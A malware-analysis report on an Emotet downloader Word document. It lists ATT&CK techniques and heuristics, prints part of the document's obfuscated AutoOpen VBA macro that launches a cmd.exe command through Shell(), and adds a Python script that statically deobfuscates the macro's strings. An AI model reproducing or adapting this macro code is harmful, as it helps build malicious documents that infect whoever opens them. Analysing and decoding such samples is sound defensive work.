Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The critical OLE_VBA_SHELL heuristic fired: the VBA project calls Shell(), and an AutoOpen macro is present to trigger it as soon as the document is opened with macros enabled. ClamAV identifies the file as Doc.Downloader.Emotet-6884162-0, i.e. an Emotet maldoc whose purpose is to fetch the next stage. The extracted macro preview bears this out. AutoOpen's only effective statement is a VBA.Shell call (the surrounding TypeName lines are no-op padding that fails silently under On Error Resume Next), and its argument is assembled from string fragments and Chr() calls whose arguments are padded with undeclared variables; because an undeclared VBA variable is Empty, each such sum collapses to the literal character code (Chr(67) is "C", Chr(34) is a double quote). The two helper functions recovered in full, FWFsKb and RoavPKhzp, concatenate to the start of a cmd /V /C "set ... command followed by a for %X in ( ... ) list of numeric indices, a shape familiar from Emotet maldocs; the leading "c" is presumably supplied by KeyString(vbKeyC). The alphabet variable and the rest of the index list sit in the truncated part of the script, so the final command line cannot be recovered from this preview alone and needs the full macros.bas or a sandbox run. Two caveats on the remaining findings: the OLE_LEGACY_WORDBASIC_AUTOEXEC description states that no modern VBA project was recovered, which the macros.bas artifact below contradicts, so treat it as a duplicate signal on the same AutoOpen marker rather than independent evidence; and the single embedded URL, http://schemas.openxmlformats.org/drawingml/2006/main, is the standard DrawingML XML namespace found in ordinary Office files, not a download location or C2 indicator.
Heuristics (6)
- ClamAV: Doc.Downloader.Emotet-6884162-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6884162-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): the document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17129 bytes | 8ff5a72ac7bb97232cd63edd0c8eb1494a390dfcc700dbf561db59fc50d7e60d |
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "UAAprPKDkj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName CDate(FDCtG)
TypeName ChrB(OumrLJ - KmduV)
TypeName 4
TypeName Atn(FwBzEv)
VBA.Shell# KeyString(DzZjkPIj + CciFzUXZM + vbKeyC + bLOSwrzBEFijw + TZURFOE) + jfFnIXww + cnKNlXLidI + FWFsKb + RoavPKhzp + DfWDPjw + CttYJQHpJkm + kBGhYkZJYAA + AQwuqitCS + DbzjmSSuR + trvYw + ICZHvtzKint + TsrnZ + CGUwjYvzuc + cssis + hFmTlKshIm + XPJMitujbVp, 568900977 - 568900977
TypeName Cos(211188863)
TypeName 1
End Sub
Attribute VB_Name = "HZsANvFGFaSmB"
Function FWFsKb()
On Error Resume Next
TypeName ChrB(docLC / bpmKW)
TypeName Cos(HRUUF / jnbIQ + rYLAu + JVzaI)
TypeName Cos(JkIsw)
JnjdZ = "md " + " " + "/V" + " " + " /" + CStr(Chr(RZUiUDkwvPUCi + VpXJfsUODZ + 67 + cYHHCzXGECw + wIOMjwfIFiZ)) + " " + " " + CStr(Chr(rzzKRIHWIYoI + HqQStni + 34 + FBTcjXWphzTI + tlnbIqja)) + "se"
TypeName Log(OhICT / jHcZkp + 28400 - OoScD)
TypeName hNFHih
MAwzroEjfm = "t " + " " + " " + " t" + "Yf" + "1" + "=Nq" + CStr(Chr(uYSpPjUEJ + JzjbwljHJzthj + 99 + GMVrAfzCiHFh + iOwNRkn)) + "pu" + "vu" + CStr(Chr(JEASuSA + RiaHiSLMLvzT + 99 + JGikvTP + wMMmAMCjiQUPra))
TypeName Cos(QdAwbX + XqSfX)
TypeName 7
TypeName fwjEB
UUwbS = "rN" + "wDR" + "z" + "Spi" + "W" + "w" + "Bw"
TypeName Hex(lbzQoC)
TypeName Oct(97)
TypeName Cos(zIFsYS * 62608 - 10437 - YBtWii)
DRIBTh = "i" + "vZ" + CStr(Chr(jBFYrJjQAqM + EXWiobvWfLzI + 99 + CYoSfHDPS + CpfvmJAmB)) + "W" + CStr(Chr(zlDzbKAqFQfti + YhJipEMQ + 99 + PbsBzWKmJbDO + tOcEzWvBDal)) + "k" + "vww"
TypeName Int(PUbGOV + iiOXV)
TypeName Sgn(dXUKqC)
VXQdHWQH = "wu" + "a" + "i" + CStr(Chr(WnolVRNMiHo + VHUQIJAikacHSP + 67 + XSQftnwVp + SSKGnzCAojmRbS)) + "WP" + "fh" + "2" + "n" + CStr(Chr(MLdCBXwLpYaB + zabLiMaT + 108 + PPBhkAoN + lJMfwvU)) + "m" + "gF\" + "'j"
FWFsKb = JnjdZ + MAwzroEjfm + UUwbS + DRIBTh + VXQdHWQH
TypeName CBool(RrXNcC)
TypeName 71
TypeName 83
End Function
Function RoavPKhzp()
On Error Resume Next
TypeName 75
TypeName 397972860
YwdJj = "${x" + "()=" + "/H" + "A" + "+,4" + "." + "V" + "8}e" + "G" + ":to" + CStr(Chr(OWBSjjLqP + LsVTnmWQapkN + 76 + WqOvPmraCbn + UBYJYdJqsosrKZ))
TypeName dKfhoA
TypeName Oct(mRCju + 6011)
HiwHRsji = "yd-" + "@ s" + ";b&" + "& f" + "or " + " %X" + " " + "in" + " " + "( " + "15"
TypeName Int(zXVszf)
TypeName Hex(44)
TypeName CSng(964)
UnlriHBzU = " 69" + " " + " 31" + " " + " " + " " + " "
TypeName QNzGT
TypeName 7880
TypeName Tan(UmMcnV)
AXPzT = "65 " + "8" + " 76" + " " + " 3" + "9 6" + "5" + " "
TypeName CLng(ittSXn)
TypeName jnBZzj
TypeName Rnd(426249057)
cLHJJbowSz = " 4" + "2 " + " 42" + " 7" + "5 " + " 49" + " 8" + " " + "7" + "6 " + " " + " " + "13 "
TypeName CDate(wiaVE + 43003)
TypeName Log(997)
TypeName 7
DjSnFuB = "54 " + " " + "41" + " 6" + "5 " + " " + "3" + "1 "
TypeName XZBiz
TypeName Sin(jAFSn * OMBOj)
TypeName Cos(11965965)
BPZwkBtP = " " + " 7" + "3" + " " + " 69" + " " + " " + "7" + "8 " + " "
TypeName CDbl(410)
TypeName Int(akJFS)
TypeName CDbl(372)
DJfbhG = "4" + "8 " + "6" + "5" + " " + "26" + " " + "68 " + " " + " "
RoavPKhzp = YwdJj + HiwHRsji + UnlriHBzU + AXPzT + cLHJJbowSz + DjSnFuB + BPZwkBtP + DJfbhG
TypeName zFwto
TypeName CByte(69115 / cdjAj)
End Function
Function DfWDPjw()
On Error Resume Next
TypeName Oct(vDswV * hhuiid)
TypeName PzIQtR
EwGmjF = "75 " + " " + "9 " + " 6" + "5 6" + "8" + " " + " " + "61" + " " + "36" + " " + " "
TypeName 500749238
TypeName Sqr(NZsJTE)
TypeName zCWtLJ
EwYioMMA = " " + " " + "65 " + " " + "78" + " 35" + " " + "4" + "2 " + " " + " 34" + " 6" + "5 "
TypeName Hex(32)
TypeName 179
XoidKE = "41" + " 6" + "8 " + " 7" + "7 " + "49 " + "23 " + "12 "
TypeName SGQjO
TypeName C
... (truncated)
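As an added worked example (not part of the report and not the sample's own code), the Python script below statically evaluates the string-building idiom visible in the preview. It parses the VBA text, treats every identifier that is neither assigned in the current procedure nor a recovered Function as Empty (VBA's value for an undeclared variable: "" in a concatenation, 0 in arithmetic, which is what the missing Option Explicit and the On Error Resume Next rely on), folds CStr(Chr(junk + 67 + junk)) to "C", follows references from the Shell() argument into the helper Functions, and reports every name it could not resolve so the gaps left by the truncated preview stay visible. The embedded sample is the AutoOpen, FWFsKb and RoavPKhzp bodies copied from the preview above with the no-op TypeName padding removed; names such as DfWDPjw whose bodies fall outside the preview therefore appear as unresolved. Treating KeyString(vbKeyC) as the letter "c" is an assumption about Word's Application.KeyString, and the tokenizer only covers the shapes this sample uses (string literals, calls nested one level deep, top-level + chains).

```python
import re

# Constructed sample: AutoOpen, FWFsKb and RoavPKhzp copied from the preview above, minus the "TypeName" padding.
SAMPLE = r"""
Sub AutoOpen()
TypeName CDate(FDCtG)
VBA.Shell# KeyString(DzZjkPIj + CciFzUXZM + vbKeyC + bLOSwrzBEFijw + TZURFOE) + jfFnIXww + cnKNlXLidI + FWFsKb + RoavPKhzp + DfWDPjw + CttYJQHpJkm + kBGhYkZJYAA + AQwuqitCS + DbzjmSSuR + trvYw + ICZHvtzKint + TsrnZ + CGUwjYvzuc + cssis + hFmTlKshIm + XPJMitujbVp, 568900977 - 568900977
End Sub
Function FWFsKb()
JnjdZ = "md " + " " + "/V" + " " + " /" + CStr(Chr(RZUiUDkwvPUCi + VpXJfsUODZ + 67 + cYHHCzXGECw + wIOMjwfIFiZ)) + " " + " " + CStr(Chr(rzzKRIHWIYoI + HqQStni + 34 + FBTcjXWphzTI + tlnbIqja)) + "se"
MAwzroEjfm = "t " + " " + " " + " t" + "Yf" + "1" + "=Nq" + CStr(Chr(uYSpPjUEJ + JzjbwljHJzthj + 99 + GMVrAfzCiHFh + iOwNRkn)) + "pu" + "vu" + CStr(Chr(JEASuSA + RiaHiSLMLvzT + 99 + JGikvTP + wMMmAMCjiQUPra))
UUwbS = "rN" + "wDR" + "z" + "Spi" + "W" + "w" + "Bw"
DRIBTh = "i" + "vZ" + CStr(Chr(jBFYrJjQAqM + EXWiobvWfLzI + 99 + CYoSfHDPS + CpfvmJAmB)) + "W" + CStr(Chr(zlDzbKAqFQfti + YhJipEMQ + 99 + PbsBzWKmJbDO + tOcEzWvBDal)) + "k" + "vww"
VXQdHWQH = "wu" + "a" + "i" + CStr(Chr(WnolVRNMiHo + VHUQIJAikacHSP + 67 + XSQftnwVp + SSKGnzCAojmRbS)) + "WP" + "fh" + "2" + "n" + CStr(Chr(MLdCBXwLpYaB + zabLiMaT + 108 + PPBhkAoN + lJMfwvU)) + "m" + "gF\" + "'j"
FWFsKb = JnjdZ + MAwzroEjfm + UUwbS + DRIBTh + VXQdHWQH
End Function
Function RoavPKhzp()
YwdJj = "${x" + "()=" + "/H" + "A" + "+,4" + "." + "V" + "8}e" + "G" + ":to" + CStr(Chr(OWBSjjLqP + LsVTnmWQapkN + 76 + WqOvPmraCbn + UBYJYdJqsosrKZ))
HiwHRsji = "yd-" + "@ s" + ";b&" + "& f" + "or " + " %X" + " " + "in" + " " + "( " + "15"
UnlriHBzU = " 69" + " " + " 31" + " " + " " + " " + " "
AXPzT = "65 " + "8" + " 76" + " " + " 3" + "9 6" + "5" + " "
cLHJJbowSz = " 4" + "2 " + " 42" + " 7" + "5 " + " 49" + " 8" + " " + "7" + "6 " + " " + " " + "13 "
DjSnFuB = "54 " + " " + "41" + " 6" + "5 " + " " + "3" + "1 "
BPZwkBtP = " " + " 7" + "3" + " " + " 69" + " " + " " + "7" + "8 " + " "
DJfbhG = "4" + "8 " + "6" + "5" + " " + "26" + " " + "68 " + " " + " "
RoavPKhzp = YwdJj + HiwHRsji + UnlriHBzU + AXPzT + cLHJJbowSz + DjSnFuB + BPZwkBtP + DJfbhG
End Function
"""

VBKEY = {f"vbKey{c}": ord(c) for c in "ABCDEFGHIJKLMNOPQRSTUVWXYZ"}  # vbKeyA..vbKeyZ = 65..90
TERM_RE = re.compile(r'"(?:[^"]|"")*"|\w+\([^()]*(?:\([^()]*\))?\)|\w+|[+,]')  # literal | call | name | op
PROC_RE = re.compile(r"(?:Function|Sub)\s+(\w+)\s*\(")
ASSIGN_RE = re.compile(r"(\w+)\s*=\s*(.+)")  # "TypeName ..." and "On Error ..." padding never match
SHELL_RE = re.compile(r"(?:VBA\.)?Shell(?:[#$%!&]|\s|(?=\())\s*(.+)")
CALL_RE = re.compile(r"(?:CStr\()?(Chr[BW]?|KeyString)\((.*?)\)\)?")  # CStr(Chr(x)) / Chr(x) / KeyString(x)


def split_top(expr):
    """Top-level terms of a '+' chain; stops at the ',' that begins Shell's second argument."""
    terms = []
    for tok in TERM_RE.findall(expr):
        if tok == ",":
            break
        if tok != "+":
            terms.append(tok)
    return terms


def parse_vba(src):
    """Map each Sub/Function name to its body lines; Attribute lines outside procedures are ignored."""
    procs, current = {}, None
    for line in map(str.strip, src.splitlines()):
        if m := PROC_RE.match(line):
            current, procs[m.group(1)] = m.group(1), []
        elif re.match(r"End (?:Function|Sub)\b", line):
            current = None
        elif current is not None:
            procs[current].append(line)
    return procs


class Evaluator:
    """VBA without Option Explicit: an undeclared name is Empty ("" when concatenated, 0 when added)."""
    def __init__(self, procs):
        self.procs, self.cache, self.shells, self.unresolved = procs, {}, [], set()

    def term(self, t, env):
        if t.startswith('"'):
            return t[1:-1].replace('""', '"')
        if m := CALL_RE.fullmatch(t):  # CStr(Chr(junk + 67 + junk)) -> "C": the junk names sum to 0
            code = sum(int(a) if a.isdigit() else self.resolve(a, env) or 0 for a in split_top(m.group(2)))
            if m.group(1) == "KeyString":
                # ASSUMPTION: Word's Application.KeyString(vbKeyX) yields that key's letter, so vbKeyC -> "c"
                return chr(code).lower() if 65 <= code <= 90 else ""
            return chr(code)
        return self.resolve(t.rstrip("()"), env)  # bare name, or a user Function called as Name()

    def eval(self, expr, env):
        vals = [v for v in (self.term(t, env) for t in split_top(expr)) if v is not None]
        return "".join(str(v) for v in vals) if vals else None

    def resolve(self, name, env):
        if name in env or name in VBKEY:
            return env.get(name, VBKEY.get(name))
        if name in self.procs:
            return self.run(name)
        return self.unresolved.add(name)  # set.add() returns None: undeclared junk, or a helper cut off by the preview

    def run(self, name):
        """Evaluate a procedure once; a Function returns whatever was last assigned to its own name."""
        if name not in self.cache:
            self.cache[name], env = None, {}  # None first guards against self-reference
            for line in self.procs[name]:
                if m := SHELL_RE.match(line):  # Shell's first argument, evaluated; split_top stops at the ","
                    self.shells.append((name, self.eval(m.group(1), env) or ""))
                elif m := ASSIGN_RE.match(line):
                    env[m.group(1)] = self.eval(m.group(2), env)
            self.cache[name] = env.get(name)
        return self.cache[name]

    def shell_commands(self):
        for name in self.procs:
            self.run(name)
        return self.shells
```

Calling Evaluator(parse_vba(SAMPLE)).shell_commands() yields a single ("AutoOpen", command) pair whose command begins with cmd  /V  /C  "set    tYf1=Nqcpuvuc and continues with the for  %X in ( 15 69 31 ... ) index list, while the evaluator's unresolved set lists DfWDPjw and the other helpers the preview cuts off; the double spaces are in the sample's own fragments, and cmd.exe tolerates them.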